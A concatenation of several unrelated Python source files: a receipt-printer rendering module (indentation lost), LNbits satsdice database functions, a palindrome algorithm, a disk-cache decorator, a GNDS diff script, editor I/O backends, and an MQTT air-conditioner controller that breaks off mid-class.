self.p = Serial(devfile=printerConf['dev'],
baudrate=[int(printerConf['baudrate']) if 'baudrate' in printerConf else 9600][0])
self.p.open()
self.printerWidth = printerConf['printerWidth']
self.basedir = dirname(realpath(__file__)) + sep + pardir + sep
self.printerConf = printerConf
def imBox(self, width, height):
"""Create a white rectangle"""
img = Image.new("1", (width, height))
draw = ImageDraw.Draw(img)
bgColor=255
draw.rectangle((0,0) + img.size,fill=bgColor)
return img
def imText(self, text, align="left",
textSize=None, rotate=None, bgColor=255, fontColor=0, scale=None,
leading=0.25, txtWidth=None):
"""Render an image using a truetype font. Text may be be a list of string
objects (one object per line). If a line is too wide the function will try to line wrap.
Arg. 'leading' is the interline spacing in as a proportion of the height of a line.
Arg. 'scale' is the proportion of the width of the paper."""
if not textSize:
textSize = int(self.printerConf['textSize'])
if not txtWidth:
txtWidth = self.printerConf['printerWidth']
font = ImageFont.truetype(self.printerConf['fontFile'], textSize)
def splitList(txtWidth, txtList, font, newlineSplitOnly=False):
"""Each str/unicode in txtList equals one line when printet. Split at newlines and furthermore split if a line is too wide."""
# First of search for newlines and split the list if a newline is found
withoutNewlines = []
for txt in txtList:
withoutNewlines.extend(txt.split("\n"))
txtList = withoutNewlines
if newlineSplitOnly:
return txtList
txtListWrapped = []
for txt in txtList:
# If the whole line is too wide, remove words until we are good
if font.getsize(txt)[0] > txtWidth:
txtLen = len(txt)
for i in range(txtLen)[::-1]:
if font.getsize(txt[:i+1])[0] <= txtWidth:
whitespaceEtc = [ " ", "\t", "-" ]
if txt[i] in whitespaceEtc:
txtSplit = [ txt[:i+1].rstrip(), txt[i+1:] ]
if font.getsize(txtSplit[1])[0] > txtWidth:
txtSplit = splitList(txtWidth, txtSplit, font)
break
else:
break
# If there are no whitespaces etc. then split the word
elif not any(w in txt[:i+1] for w in whitespaceEtc):
if font.getsize(txt[:i+1]+"-")[0] <= txtWidth:
txtSplit = [ txt[:i+1].rstrip()+"-", txt[i+1:] ]
if font.getsize(txtSplit[1])[0] > txtWidth:
txtSplit = splitList(txtWidth, txtSplit, font)
break
else:
break
else:
continue
else:
txtSplit = [ txt ]
txtListWrapped.extend(txtSplit)
return txtListWrapped
# If txtList is a simple string make it a list
if type(text) is list:
txtList = text
else:
txtList = [ text ]
# Spacing between lines as a proportion of the width of a danish letter for the current text size.
leadingDots = int(font.getsize(u"Å")[0]*leading)
if rotate in [ 90, 270 ]:
# Don't wrap lines based on width when turned 90 or 270 degrees
txtList = splitList(txtWidth, txtList, font, newlineSplitOnly=True)
else:
# Do wordwrapping etc.
txtList = splitList(txtWidth, txtList, font)
# Determine the size of the resulting text image
size = [0,0]
lineHeight = font.getsize("a")[1]
size = [ 0, ( leadingDots + lineHeight ) * len(txtList) + leadingDots]
# Find the width
        if rotate == 180:
# Avoid right alignment of rotated text, if a line is less wide than the paper / printerConf['printerWidth']
size[0] = self.printerConf['printerWidth']
else:
for txt in txtList:
maxWidth = font.getsize(txt)[0]
if maxWidth > size[0]:
size[0] = maxWidth
# Create the actual image containing the text
img = Image.new("1",size)
draw = ImageDraw.Draw(img)
draw.rectangle((0,0) + img.size,fill=bgColor)
pointer = [0, 0]
# For each line..
for txt in txtList:
txtPxWidth = font.getsize(txt)[0]
if align == "left":
pointer[0] = 0
elif align == "right":
pointer[0] = size[0] - txtPxWidth
elif align == "center":
pointer[0] = (size[0] - txtPxWidth)/2
draw.text(pointer, txt, font=font, fill=fontColor)
pointer[1] += lineHeight + leadingDots
if rotate:
angles = [0, 90, 180, 270]
if rotate in angles:
img = img.rotate(rotate, expand=True)
else:
raise ValueError("rotate must be part of %s if set " % str(angles))
if rotate in [90, 270]:
if img.size[0] > self.printerConf['printerWidth'] and not scale:
raise Exception("The textSize is too large to print. Use either a smaller textSize or the scale parameter")
else:
if img.size[0] > self.printerConf['printerWidth']:
raise Exception("Could not print the text. One or more lines are too wide. Did you choose a very large font?")
if align is not "left":
imgOld = img
img = Image.new("1",(txtWidth,imgOld.size[1]))
draw = ImageDraw.Draw(img)
draw.rectangle((0,0) + img.size,fill=bgColor)
pointer = [0, 0]
if align is "center":
i = 2
else:
i = 1
img.paste(imgOld,((txtWidth-imgOld.size[0])/i,0))
return img
def printLine(self, pxWidth=False, width=1.0, pxThickness=4, pxHeading=10, pxTrailing=10):
"""Prints a horisontal line.
If width is set then pxWidth is ignored. width higher than 1.0 is ignored."""
# calculate dimensions
if not pxWidth:
pxWidth = int(self.printerConf['printerWidth'] * width)
pxHeight = pxHeading + pxThickness + pxTrailing
img = Image.new("1", (self.printerConf['printerWidth'], pxHeight))
draw = ImageDraw.Draw(img)
draw.rectangle((0,0,self.printerConf['printerWidth'], pxHeight), fill=255)
draw.rectangle(((self.printerConf['printerWidth'] - pxWidth)/2,pxHeading,
(self.printerConf['printerWidth'] - pxWidth)/2 + pxWidth,pxHeading+pxThickness), fill=0)
return img
def combinePILObjects(self, imgArray, doPrint=True, multiCol=False, ignoreRotate=False):
"""Combine objects and print them"""
if multiCol:
            # Multiple columns object (e.g. printing weather forecast). imgArray is then an array of arrays.
imArray = [ self.combinePILObjects(i, doPrint=False, ignoreRotate=True) for i in imgArray]
# Determine height pre multicol
orgMaxHeight=0
for im in imArray:
h = im[0].size[1]
if h > orgMaxHeight:
orgMaxHeight = h
numCols = len(imArray)
imgMaster = self.imBox(self.printerConf['printerWidth'], orgMaxHeight/numCols)
# Paste the columns together
offset = 0
numCols = len(imArray)
colWidth = self.printerConf['printerWidth'] / numCols
for i in imArray:
imgMaster.paste(i[0].resize([colWidth, int(i[0].size[1]*1./numCols)]),(offset,0))
offset += colWidth
else:
# Calculate height
height = 0
imgTooWide=False
for i in range(len(imgArray)):
img = imgArray[i]
# If an image is too large
if img.size[0] > self.printerConf['printerWidth']:
# resize image
imgArray[i] = img.resize([self.printerConf['printerWidth'],
int(img.size[1]*float(self.printerConf['printerWidth'])/img.size[0])])
height += imgArray[i].size[1]
# Create
imgMaster = self.imBox(self.printerConf['printerWidth'], height)
offset = 0
for img in imgArray:
imgMaster.paste(img,(0,offset))
offset += img.size[1]
if self.printerConf['rotate'] and not ignoreRotate:
imgMaster = imgMaster.rotate(180)
height = imgMaster.size[1]
bytes_io = BytesIO()
imgMaster.save(bytes_io, format="PNG")
bytes_io.seek(0)
imgData = bytes_io.read()
if doPrint:
bytes_io.seek(0)
self.p.image(bytes_io, impl=self.printerConf['printType'])
# return: PIL-object, height (int), PNG-file
return(imgMaster, height, imgData)
def qrIcon(self, url, size=120):
iconHeight = size
qr = qrcode.QRCode(
version=1,
error_correction=qrcode.constants.ERROR_CORRECT_M,
box_size=10,
border=4,
)
qr.add_data(url)
qr.make(fit=True)
img = qr.make_image()
return img.resize((iconHeight,iconHeight))
def commonPrint(self, conn, srcType):
try:
dbPrinter = conn.cursor()
dbPrinter.execute("""SELECT printout.id, printout.jdoc
FROM printout INNER JOIN srcType
ON srcType.id = printout.srcType
WHERE srcType.shortName = %s AND printed = 0
ORDER BY printout.id ASC LIMIT 1""", (srcType,))
row = dbPrinter.fetchone()
# if there is something unprinted waiting for us for the given srcType
if row is not None:
data = json.loads(row[1])
printFunc = getattr(self, srcType.lower())
printData = printFunc(data)
# Hmm. one could argue that if printing something fails,
# then the message should not be marked as printed in the db..
dbPrinter.execute("""UPDATE printout SET height = %s,
printed = 1, printedImg = _binary %s, printedImgRotated = %s,
printedImgMimeType = %s WHERE id=%s""", (str(printData[0]),
printData[1], str(printData[2]),
printData[3], str(row[0])))
dbPrinter.close()
except Exception, e:
print(e)
try:
print("The id for the failed message in the printout table: %i" % row[0])
except:
pass
else:
if row is not None:
                if srcType == "Twitter":
                    print(("Printed a twitter message from %s to the printer" % data['screen_name']).encode('utf-8'))
                if srcType == "WeatherCurrent":
                    print("Printed a WeatherCurrent message")
                if srcType == "WeatherForecast":
                    print("Printed a WeatherForecast message")
def twitter(self, twitterData):
"""Construct image with the tweet and print it"""
# Create an array of PIL objects
imgArray = []
iconHeight = 120
imgQR = self.qrIcon(twitterData['url'], size=iconHeight)
imgTwit = Image.open(dirname(realpath(__file__)) + sep + pardir + sep +
"/artwork/SoMe/agata/twitter.png").convert("1")
imgTwit = imgTwit.resize([iconHeight-2*4,iconHeight-2*4]) # QR has a border of 4
#headTxt = "%s @%s %s\n%s" % (twitterData['name'], twitterData['screen_name'],
# [ "retweeted" if twitterData['retweet'] else "tweeted"][0], twitterData['created_at'][:-3])
headTxt = "%s %s\n%s" % (twitterData['name'],
[ "retweeted" if twitterData['retweet'] else "tweeted"][0], twitterData['created_at'][:-3])
imHeadTxtWidth = self.printerConf['printerWidth'] - 2*iconHeight - 2 - 12
# Insert PIL w text
imHeadTxt = self.imText(headTxt, txtWidth=imHeadTxtWidth)
imHeader = self.imBox(self.printerConf['printerWidth'],
[ imHeadTxt.size[1] if imHeadTxt.size[1] > iconHeight else iconHeight][0]+4+9)
# Paste them together
imHeader.paste(imgTwit,(0,4))
imHeader.paste(imHeadTxt,(iconHeight+12,4))
imHeader.paste(imgQR,(iconHeight+2+imHeadTxtWidth+2,0))
imgArray.append(imHeader)
imgArray.append(self.imText(twitterData['text']))
# Add images
for url in twitterData['urlPics']:
try:
                url = urllib2.urlopen(url, timeout=10)
                responseIO = StringIO(url.read())
im = Image.open(responseIO).convert("1")
imgArray.append(self.imBox(self.printerConf['printerWidth'], 10))
imgArray.append(im)
imgArray.append(self.imBox(self.printerConf['printerWidth'], 10))
except Exception, e:
print(e)
errorText = "Hrmpf... Failed to download picture from Twitter at print time. See the log for details."
imgArray.append(self.imText(errorText, bgColor=0, fontColor=255))
imgArray.append(self.printLine())
# print it
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
def weatherCloud(self, weatherData, dayType, widthDiv=1.3):
basedir=self.basedir + "artwork/weather/georg"
if dayType == "current":
dayOrNight = [ "day" if weatherData['current']['is_day'] is 1 else "night"][0]
else:
dayOrNight = "day"
try:
filePath = "%s/%s/%s.png" % (basedir,dayOrNight,weatherData[dayType]['condition']['code'])
im = Image.open(filePath,'r').convert("1")
except:
try:
filePathUnknown = "%s/%s/unknown.png" % (basedir,dayOrNight)
im = Image.open(filePathUnknown,'r').convert("1")
except Exception, e:
print "Hmm. It seems we could not read %s or %s in the same folder" % (filePath, filePathUnknown)
print(e)
raise
imWidth=int(self.printerConf['printerWidth']/widthDiv)
im = im.resize([imWidth,int(float(imWidth)/im.size[0]*im.size[1])])
imCloud = self.imBox(self.printerConf['printerWidth'], im.size[0])
imCloud.paste(im,((self.printerConf['printerWidth']-imWidth)/2,0))
return imCloud
def weathercurrent(self, weatherData):
imgArray = []
imgArray.append(self.imText('Current weather', align="center", textSize=60))
imgArray.append(self.imText("%s %s" %
(weatherData['current']['last_updated'],
weatherData['location']['name']) , align="center"))
imCloud = self.weatherCloud(weatherData, 'current')
imgArray.append(imCloud)
imgArray.append(self.imText(
weatherData['current']['condition']['text'], align="center", textSize=40))
imgArray.append(self.imText(u'%.1f\xb0' %
weatherData['current']['temp_c'], align="center", textSize=120))
# Wind speed + direction
mps = weatherData['current']['wind_kph']/3.6
imWindText = self.imText('%.1f m/s' % mps, align="left", textSize=40)
basedir=self.basedir + "artwork/weather/georg"
dayOrNight = [ "day" if weatherData['current']['is_day'] is 1 else "night"][0]
try:
filePath = "%s/%s/arrow.png" % (basedir,dayOrNight)
imArrow = Image.open(filePath,'r')
except Exception, e:
print(e)
raise
else:
imArrow = imArrow.rotate(weatherData['current']['wind_degree'], expand=True)
arrowWidth = 70
imArrow = imArrow.resize([arrowWidth,int(float(arrowWidth)/imArrow.size[0]*
imArrow.size[1])]).convert("1")
imWind = self.imBox(imWindText.size[0]+imArrow.size[0],
[ imArrow.size[1] if imArrow.size[1] > imArrow.size[0]
else imArrow.size[0]][0])
imWind.paste(imWindText,(0,0))
imWind.paste(imArrow,(imWindText.size[0]+10,0))
centeredImWind = self.imBox(self.printerConf['printerWidth'],imWind.size[1])
centeredImWind.paste(imWind,[(self.printerConf['printerWidth']-imWind.size[0])/2,0])
imgArray.append(centeredImWind)
imgArray.append(self.imText(
"%i%% rel. %.0f mPa temp. feels like %i\xb0" %
(weatherData['current']['humidity'], weatherData['current']['pressure_mb'],
weatherData['current']['feelslike_c']), align="center"))
imgArray.append(self.printLine())
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
def weatherforecast(self, weatherData):
# Header: "Weather forecast", date etc.
imgArray = []
imgArray.append(self.imText('Weather forecast', align="center", textSize=60))
imgArray.append(self.imText("%s %s" %
(weatherData['current']['last_updated'],
weatherData['location']['name']) , align="center"))
imgArray.append(self.imBox(20,20)) # some blank space / "new line"
# The forecast in multiple columns
imgSuperArray = []
for day in weatherData['forecast']['forecastday']:
imArrayDay = []
# Weekday
#dayTxt = [ "Today" if day['date'] == datetime.now().isoformat().split('T')[0] else datetime.fromtimestamp(date['date_epoch']).strftime('%A')[0]
dayTxt = datetime.fromtimestamp(day['date_epoch']).strftime('%A')[:3]
imArrayDay.append(self.imText(dayTxt, align="center", textSize=140))
# Weather cloud
imCloud = self.weatherCloud(day, 'day', widthDiv=1)
imArrayDay.append(imCloud)
# Forecast text
            # Blank spaces are added to ensure a line break if the text is too short to span at least two lines
forecastTxt = "{:<16}".format(day['day']['condition']['text'])
imArrayDay.append(self.imText(
forecastTxt, align="center", textSize=90))
# Temperature etc.
imArrayDay.append(self.imText(u'%.1f\xb0' %
day['day']['maxtemp_c'], align="center", textSize=180))
windSpeed = day['day']['maxwind_kph']/3.6
imArrayDay.append(self.imText(u'avg %.1f\xb0\nmin %.1f\xb0\nmax %.1f m/s' %
(day['day']['avgtemp_c'],day['day']['mintemp_c'],windSpeed), align="center", textSize=80))
            # Append daily forecast to multicolumn forecast
imgSuperArray.append(imArrayDay)
# Combine multicolumn forecast to one object
imgColumns, height, imgData = self.combinePILObjects(imgSuperArray, multiCol=True, doPrint=False)
# Append multicolumn forecast to what is to be printed
imgArray.append(imgColumns)
imgArray.append(self.printLine())
# Create the final image
imgMaster, height, imgData = self.combinePILObjects(imgArray)
return (height, imgData, [0 if not self.printerConf['rotate'] else 1][0], "image/png")
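# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes a
# hypothetical `printer` instance of the class above, configured with a
# `printerConf` dict, and shows how the PIL helpers compose before printing:
#
#   imgArray = []
#   imgArray.append(printer.imText("Hello, world", align="center", textSize=60))
#   imgArray.append(printer.printLine(width=0.8))
#   imgMaster, height, imgData = printer.combinePILObjects(imgArray, doPrint=False)
#   imgMaster.save("preview.png")  # inspect the rendered receipt without printing
# ---------------------------------------------------------------------------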
|
from datetime import datetime
from typing import List, Optional, Union
from lnbits.helpers import urlsafe_short_hash
from . import db
from .models import (
CreateSatsDiceLink,
CreateSatsDicePayment,
CreateSatsDiceWithdraw,
HashCheck,
satsdiceLink,
satsdicePayment,
satsdiceWithdraw,
)
async def create_satsdice_pay(wallet_id: str, data: CreateSatsDiceLink) -> satsdiceLink:
satsdice_id = urlsafe_short_hash()
await db.execute(
"""
INSERT INTO satsdice.satsdice_pay (
id,
wallet,
title,
base_url,
min_bet,
max_bet,
amount,
served_meta,
served_pr,
multiplier,
chance,
haircut,
open_time
)
VALUES (?, ?, ?, ?, ?, ?, 0, 0, 0, ?, ?, ?, ?)
""",
(
satsdice_id,
wallet_id,
data.title,
data.base_url,
data.min_bet,
data.max_bet,
data.multiplier,
data.chance,
data.haircut,
int(datetime.now().timestamp()),
),
)
link = await get_satsdice_pay(satsdice_id)
assert link, "Newly created link couldn't be retrieved"
return link
async def get_satsdice_pay(link_id: str) -> Optional[satsdiceLink]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
async def get_satsdice_pays(wallet_ids: Union[str, List[str]]) -> List[satsdiceLink]:
if isinstance(wallet_ids, str):
wallet_ids = [wallet_ids]
q = ",".join(["?"] * len(wallet_ids))
rows = await db.fetchall(
f"""
SELECT * FROM satsdice.satsdice_pay WHERE wallet IN ({q})
ORDER BY id
""",
(*wallet_ids,),
)
return [satsdiceLink(**row) for row in rows]
async def update_satsdice_pay(link_id: int, **kwargs) -> Optional[satsdiceLink]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_pay SET {q} WHERE id = ?",
(*kwargs.values(), link_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
async def increment_satsdice_pay(link_id: int, **kwargs) -> Optional[satsdiceLink]:
q = ", ".join([f"{field[0]} = {field[0]} + ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_pay SET {q} WHERE id = ?",
(*kwargs.values(), link_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_pay WHERE id = ?", (link_id,)
)
return satsdiceLink(**row) if row else None
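# Hedged usage note (illustrative only): update/increment take column=value
# kwargs and splice them into the SET clause, e.g.
#   await update_satsdice_pay(link_id, title="New title")
#   await increment_satsdice_pay(link_id, served_meta=1, served_pr=1)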
async def delete_satsdice_pay(link_id: int) -> None:
await db.execute("DELETE FROM satsdice.satsdice_pay WHERE id = ?", (link_id,))
##################SATSDICE PAYMENT LINKS
async def create_satsdice_payment(data: CreateSatsDicePayment) -> satsdicePayment:
await db.execute(
"""
INSERT INTO satsdice.satsdice_payment (
payment_hash,
satsdice_pay,
value,
paid,
lost
)
VALUES (?, ?, ?, ?, ?)
""",
(data["payment_hash"], data["satsdice_pay"], data["value"], False, False),
)
payment = await get_satsdice_payment(data["payment_hash"])
assert payment, "Newly created withdraw couldn't be retrieved"
return payment
async def get_satsdice_payment(payment_hash: str) -> Optional[satsdicePayment]:
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_payment WHERE payment_hash = ?",
(payment_hash,),
)
return satsdicePayment(**row) if row else None
async def update_satsdice_payment(
payment_hash: int, **kwargs
) -> Optional[satsdicePayment]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_payment SET {q} WHERE payment_hash = ?",
        (*(bool(v) for v in kwargs.values()), payment_hash),  # coerce each flag; works for more than one kwarg
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_payment WHERE payment_hash = ?",
(payment_hash,),
)
return satsdicePayment(**row) if row else None
##################SATSDICE WITHDRAW LINKS
async def create_satsdice_withdraw(data: CreateSatsDiceWithdraw) -> satsdiceWithdraw:
await db.execute(
"""
INSERT INTO satsdice.satsdice_withdraw (
id,
satsdice_pay,
value,
unique_hash,
k1,
open_time,
used
)
VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(
data["payment_hash"],
data["satsdice_pay"],
data["value"],
urlsafe_short_hash(),
urlsafe_short_hash(),
int(datetime.now().timestamp()),
data["used"],
),
)
withdraw = await get_satsdice_withdraw(data["payment_hash"], 0)
assert withdraw, "Newly created withdraw couldn't be retrieved"
return withdraw
async def get_satsdice_withdraw(withdraw_id: str, num=0) -> Optional[satsdiceWithdraw]:
    row = await db.fetchone(
        "SELECT * FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
    )
    return satsdiceWithdraw(**row) if row else None
async def get_satsdice_withdraw_by_hash(
    unique_hash: str, num=0
) -> Optional[satsdiceWithdraw]:
    row = await db.fetchone(
        "SELECT * FROM satsdice.satsdice_withdraw WHERE unique_hash = ?", (unique_hash,)
    )
    return satsdiceWithdraw(**row) if row else None
async def get_satsdice_withdraws(
wallet_ids: Union[str, List[str]]
) -> List[satsdiceWithdraw]:
if isinstance(wallet_ids, str):
wallet_ids = [wallet_ids]
q = ",".join(["?"] * len(wallet_ids))
rows = await db.fetchall(
f"SELECT * FROM satsdice.satsdice_withdraw WHERE wallet IN ({q})",
(*wallet_ids,),
)
return [satsdiceWithdraw(**row) for row in rows]
async def update_satsdice_withdraw(
withdraw_id: str, **kwargs
) -> Optional[satsdiceWithdraw]:
q = ", ".join([f"{field[0]} = ?" for field in kwargs.items()])
await db.execute(
f"UPDATE satsdice.satsdice_withdraw SET {q} WHERE id = ?",
(*kwargs.values(), withdraw_id),
)
row = await db.fetchone(
"SELECT * FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
)
return satsdiceWithdraw(**row) if row else None
async def delete_satsdice_withdraw(withdraw_id: str) -> None:
await db.execute(
"DELETE FROM satsdice.satsdice_withdraw WHERE id = ?", (withdraw_id,)
)
async def create_withdraw_hash_check(the_hash: str, lnurl_id: str) -> HashCheck:
await db.execute(
"""
INSERT INTO satsdice.hash_checkw (
id,
lnurl_id
)
VALUES (?, ?)
""",
(the_hash, lnurl_id),
)
hashCheck = await get_withdraw_hash_checkw(the_hash, lnurl_id)
return hashCheck
async def get_withdraw_hash_checkw(the_hash: str, lnurl_id: str) -> Optional[HashCheck]:
rowid = await db.fetchone(
"SELECT * FROM satsdice.hash_checkw WHERE id = ?", (the_hash,)
)
rowlnurl = await db.fetchone(
"SELECT * FROM satsdice.hash_checkw WHERE lnurl_id = ?", (lnurl_id,)
)
if not rowlnurl:
await create_withdraw_hash_check(the_hash, lnurl_id)
return {"lnurl": True, "hash": False}
else:
if not rowid:
await create_withdraw_hash_check(the_hash, lnurl_id)
return {"lnurl": True, "hash": False}
else:
return {"lnurl": True, "hash": True}
|
def LPSubstr(s):
    """Return the longest even-length and the longest odd-length palindromic
    substring of s, found in linear time with a Manacher-style scan
    (z=0 handles even centers, z=1 odd centers)."""
    n = len(s)
    p = [[0] * (n + 1), [0] * n]
for z, p_z in enumerate(p):
left, right = 0, 0
for i in range(n):
t = right - i + 1 - z
if i < right:
p_z[i] = min(t, p_z[left + t])
L, R = i - p_z[i], i + p_z[i] - 1 + z
while (L >= 1) and (R + 1 < n) and (s[L - 1] == s[R + 1]):
p_z[i] += 1
L -= 1
R += 1
if R > right:
left, right = L, R
i1, x1 = max(enumerate(p[0]), key=lambda x: x[1])
i2, x2 = max(enumerate(p[1]), key=lambda x: x[1])
return s[i1 - x1:i1 + x1], s[i2 - x2:i2 + x2 + 1]
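# Hedged usage sketch (not in the original file): a quick sanity check of
# LPSubstr on a small input; expected values follow from the docstring.
if __name__ == "__main__":
    even, odd = LPSubstr("abbacecab")
    print(even)  # expected "abba" (longest even-length palindrome)
    print(odd)   # expected "aceca" (longest odd-length palindrome)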
|
import os
import pickle
import time
from functools import wraps
from threading import Thread, Lock
from typing import Dict, List
from .logging_utils import logger
decorator_with_args = lambda d: lambda *args, **kwargs: lambda func: wraps(func)(
d(func, *args, **kwargs)
)
def write_to_file(cache, f_name, lock, index, it_is_too_late, sleep_time):
log_prefix = f"t{index} for {f_name}:"
logger.debug(f"{log_prefix} sleeping for {sleep_time}")
time.sleep(sleep_time)
if not it_is_too_late[index] and not lock.locked():
with lock:
with open(f_name, "wb") as f:
pickle.dump(cache, f)
logger.debug(f"{log_prefix} written to file")
else:
logger.debug(f"{log_prefix} too late or lock taken")
@decorator_with_args
def disk_cache(function, directory=".", sleep_time=2.5):
lock: Dict[str, Lock] = {}
cache: Dict[str, dict] = {}
cache_miss: Dict[str, bool] = {}
it_is_too_late: Dict[str, List[bool]] = {}
i: Dict[str, int] = {}
@wraps(function)
def wrapper(*args, **kwargs):
fu_name = function.__name__
fi_name = os.path.join(directory, f"{fu_name}.cache")
lock[fu_name] = lock.get(fu_name, Lock())
cache[fu_name] = cache.get(fu_name, {})
        cache_miss[fu_name] = cache_miss.get(fu_name, False)
it_is_too_late[fu_name] = it_is_too_late.get(fu_name, [])
i[fu_name] = i.get(fu_name, 0)
if len(cache[fu_name]) == 0 and os.path.isfile(fi_name):
with open(fi_name, "rb") as f:
cache[fu_name] = pickle.load(f)
        key = (
            args,
            # sort kwargs by name: hash() is salted per process, so a
            # hash-based order would make keys unstable across runs and
            # defeat the on-disk cache
            tuple(sorted(kwargs.items())),
        )
if key not in cache[fu_name]:
logger.debug(f"cache miss for {fu_name}")
cache[fu_name][key] = function(*args, **kwargs)
cache_miss[fu_name] = True
if cache_miss[fu_name]:
if i[fu_name] > 0:
it_is_too_late[fu_name][-1] = True
it_is_too_late[fu_name].append(False)
Thread(
target=write_to_file,
args=(
cache[fu_name],
fi_name,
lock[fu_name],
i[fu_name],
it_is_too_late[fu_name],
sleep_time,
),
).start()
cache_miss[fu_name] = False
i[fu_name] += 1
return cache[fu_name][key]
return wrapper
if __name__ == "__main__":
pass
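    # Hedged usage sketch (slow_square is hypothetical; kept commented because
    # the relative import above prevents running this module as a script):
    #
    # @disk_cache(directory=".", sleep_time=0.5)
    # def slow_square(x):
    #     time.sleep(0.1)
    #     return x * x
    #
    # slow_square(4)  # miss: computed, then persisted to slow_square.cache
    # slow_square(4)  # hit: served from the in-memory copy of the cache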
|
#! /usr/bin/env python3
# <<BEGIN-copyright>>
# Copyright 2021, Lawrence Livermore National Security, LLC.
# See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: BSD-3-Clause
# <<END-copyright>>
description = """Diffs two GNDS files. Prints the diff information to the terminal.
Converts the energy unit of the second GNDS file to the first GNDS file if needed.
The GNDS files must be formatted in the same GNDS format version or a raise will be executed."""
__doc__ = description
import os
from argparse import ArgumentParser
from fudge import reactionSuite as reactionSuiteModule
parser = ArgumentParser( description = description )
parser.add_argument( "GNDSFile1", help = "The name of the first GNDS file." )
parser.add_argument( "GNDSFile2", help = "The name of the second GNDS file." )
args = parser.parse_args( )
protare1 = reactionSuiteModule.readXML( args.GNDSFile1 )
protare2 = reactionSuiteModule.readXML( args.GNDSFile2 )
if( protare1.format != protare2.format ) : raise Exception( 'GNDS formats not the same: "%s" vs. "%s".' % ( protare1.format, protare2.format ) )
if( protare1.domainUnit != protare2.domainUnit ) : protare2.convertUnits( { protare2.domainUnit : protare1.domainUnit } )
print( "FILE1: %s" % os.path.realpath( args.GNDSFile1 ) )
print( "FILE2: %s" % os.path.realpath( args.GNDSFile2 ) )
print( protare1.diff( protare2 ) )
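# Hedged usage note (the script name below is whatever this file is saved as):
#   python <thisScript>.py first.gnds.xml second.gnds.xml
# prints the real paths of both files followed by their diff.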
|
import pathlib
import gzip
import os
import six
from .base import EditorIO
__all__ = (
'FileIO',
'GZipFileIO',
'DirectoryIO',
# 'HttpIO',
)
ENCODINGS = ['utf-8', 'latin-1']
class FileIO(EditorIO):
"""
I/O backend for the native file system.
"""
    @classmethod
    def can_open_location(cls, location: pathlib.Path):
        # We can handle all local files.
        return location.is_file()
def exists(self, location: pathlib.Path):
return location.is_file()
def read(self, location: pathlib.Path):
"""
Read file from disk.
"""
# Try to open this file, using different encodings.
        for e in ENCODINGS:
            try:
                with location.open('r', encoding=e) as f:
                    return f.read(), e
            except UnicodeDecodeError:
                pass  # Try next codec.
# Unable to open.
raise Exception('Unable to open file: %r' % location)
def write(self, location: pathlib.Path, text, encoding):
"""
Write file to disk.
"""
with location.open('w', encoding=encoding) as f:
f.write(text)
class GZipFileIO(EditorIO):
"""
I/O backend for gzip files.
It is possible to edit this file as if it were not compressed.
The read and write call will decompress and compress transparently.
"""
    @classmethod
    def can_open_location(cls, location):
        return FileIO.can_open_location(location) and location.suffix == '.gz'
def exists(self, location):
return FileIO().exists(location)
def read(self, location):
location = os.path.expanduser(location)
with gzip.open(location, 'rb') as f:
data = f.read()
return _auto_decode(data)
def write(self, location, text, encoding):
"""
Write file to disk.
"""
location = os.path.expanduser(location)
with gzip.open(location, 'wb') as f:
f.write(text.encode(encoding))
class DirectoryIO(EditorIO):
"""
Create a textual listing of the directory content.
"""
    @classmethod
    def can_open_location(cls, location: pathlib.Path):
        # We can handle all local directories.
        return location.is_dir()
def exists(self, location: pathlib.Path):
return location.is_dir()
def read(self, directory):
# Read content.
content = sorted(os.listdir(directory))
directories = []
files = []
for f in content:
if os.path.isdir(os.path.join(directory, f)):
directories.append(f)
else:
files.append(f)
# Construct output.
result = []
result.append('" ==================================\n')
result.append('" Directory Listing\n')
result.append('" %s\n' % os.path.abspath(directory))
result.append('" Quick help: -: go up dir\n')
result.append('" ==================================\n')
result.append('../\n')
result.append('./\n')
for d in directories:
result.append('%s/\n' % d)
for f in files:
result.append('%s\n' % f)
return ''.join(result), 'utf-8'
def write(self, location, text, encoding):
raise NotImplementedError('Cannot write to directory.')
def isdir(self, location):
return True
# class HttpIO(EditorIO):
# """
# I/O backend that reads from HTTP.
# """
# def can_open_location(cls, location):
# # We can handle all local directories.
# return location.startswith('http://') or location.startswith('https://')
# def exists(self, location):
# return NotImplemented # We don't know.
# def read(self, location):
# # Do Http request.
# bytes = urllib.request.urlopen(location).read()
# # Return decoded.
# return _auto_decode(bytes)
# def write(self, location, text, encoding):
# raise NotImplementedError('Cannot write to HTTP.')
def _auto_decode(data):
"""
Decode bytes. Return a (text, encoding) tuple.
"""
assert isinstance(data, six.binary_type)
for e in ENCODINGS:
try:
return data.decode(e), e
except UnicodeDecodeError:
pass
return data.decode('utf-8', 'ignore')
|
import paho.mqtt.client as mqtt  # import the client
import time
def on_data(topic,message):
print(topic, message)
# This is a helper class responsible for controlling A/C.
# We can adjust all settings or single setting at one time.
class AC:
def __init__(self, topic, IP):
print("Connecting to PI...")
self.topic = topic
self.broker = IP
self.client = mqtt.Client("P1") #create new instance
# self.client.on_message=self.on_message #attach function to callback
self.client.connect(self.broker) #connect to broker
print("Connected to PI successfully.")
# This is the message format to be sent to A/C
def create_config_string(self, id = "-", mode = "-", fan = "-", temp = "-", power = "-" ):
return str(id) + "," + str(mode) + "," + str(fan) + "," + str(temp) + "," + str(power)
def start(self):
self.client.loop_forever() #start the loop
def set_fan_speed(self, id, speed):
